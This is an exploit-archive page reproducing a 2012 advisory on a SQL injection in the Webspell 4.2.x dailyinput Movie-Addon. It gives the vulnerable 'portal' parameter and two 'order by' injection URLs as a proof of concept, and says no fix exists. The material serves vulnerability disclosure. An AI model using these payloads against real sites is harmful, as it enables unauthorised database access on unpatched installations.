header-logo
Suggest Exploit
vendor:
Webspell 4.2.x dailyinput Movie-Addon
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
N/A
CWE
Product Name: Webspell 4.2.x dailyinput Movie-Addon
Affected Version From: Webspell 4.2.x
Affected Version To: Webspell 4.2.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability

dailyinput Movie-Addon is a Addon for the Webspell Web Application the Content Management System. In this Addon we found a Remote SQL Injection vulnerability.The Movie file is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most Webspell Webapplication has a Security System in the Webspell core self.You must bypass the core from Webspell Security System (globalskiller).

Mitigation:

No fix.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability
| # Author   : Easy Laster
| # Script   : Webspell 4.2.x dailyinput Movie-Addon
| # Site     : www.kode-designs.com 
| # Download : www.setgaming.de/index.php?site=files&file=26
| # Demo     : www.setgaming.de/index.php?site=videos
| # Price    : free
| # Exploitation : Remote SQL Vulnerability
| # Bug      : Remote SQL Vulnerability
| # Date     : 08.06.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
======================        Proof of Concept         =================================
  
  
  [+] Introduction
    
   dailyinput Movie-Addon is a Addon for the Webspell Web Application the Content Management 
   System. In this Addon we found a Remote SQL Injection vulnerability.The Movie file
   is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most  
   Webspell Webapplication has a Security System in the Webspell core self.You must bypass 
   the core from Webspell Security System (globalskiller).
   
  
  [+] Vulnerability
  
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=[vul]
  
  [+] Exploit
    
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+5--+
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+4--+
  
  [+] Fix
  
    No fix.

Navigation

Suggest Exploit

Services By CQR